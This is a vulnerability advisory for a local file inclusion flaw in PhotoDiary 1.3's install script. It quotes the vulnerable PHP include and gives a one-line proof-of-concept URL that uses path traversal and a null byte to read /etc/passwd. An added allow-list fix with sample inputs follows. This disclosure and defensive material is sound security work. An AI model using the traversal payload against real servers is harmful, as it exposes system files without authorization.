PhotoDiary 1.3 (lng) Local File Inclusion Vulnerability
Discovered by cOndemned
download: http://code.google.com/p/photodiary/

source of /admin/install.php (lines 9 - 15):

    if (isset($_GET['lng'])){
        $LNG = $_GET['lng'];    # 1
    } else {
        $LNG = "ITA";
    }

    include "../common/language_".$LNG.".php";    # 2

proof of concept:

    http://[target_host]/admin/install.php?lng=/../../../../../../etc/passwd%00
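
A hardened form of the include at # 2, given here as an added example and not taken from PhotoDiary or the original advisory. The function name language_file() and the "ENG" language code are assumptions; only the "ITA" default and the ../common/language_*.php naming come from the source shown above.

```php
<?php
// Added example, not PhotoDiary's own code.
// Assumptions: language_file() is a hypothetical helper and "ENG" is a
// hypothetical second language; "ITA" is the default from install.php.

const LANG_DIR      = '../common';
const DEFAULT_LANG  = 'ITA';
const ALLOWED_LANGS = ['ITA', 'ENG'];

/**
 * Map the user-supplied lng value to a language file path.
 * Only an exact match against the allow-list is accepted, so "../"
 * sequences and NUL bytes never reach the include statement.
 */
function language_file($requested): string
{
    $code = DEFAULT_LANG;

    // $_GET values can also be arrays (?lng[]=x), so accept strings only
    // and compare strictly.
    if (is_string($requested) && in_array($requested, ALLOWED_LANGS, true)) {
        $code = $requested;
    }

    return LANG_DIR . '/language_' . $code . '.php';
}

// Constructed sample inputs, including the decoded lng value from the
// proof of concept above.
$samples = [
    'ENG',
    "/../../../../../../etc/passwd\0",
    ['ITA'],
    null,
];

foreach ($samples as $sample) {
    echo json_encode($sample, JSON_UNESCAPED_SLASHES),
         ' => ', language_file($sample), PHP_EOL;
}

// In install.php, lines 9 - 15 would then reduce to:
//     include language_file($_GET['lng'] ?? null);
```

Every input that is not an exact allow-list match resolves to ../common/language_ITA.php. The %00 suffix only truncates the appended ".php" on PHP versions before 5.3.4, but the allow-list removes the traversal on any version.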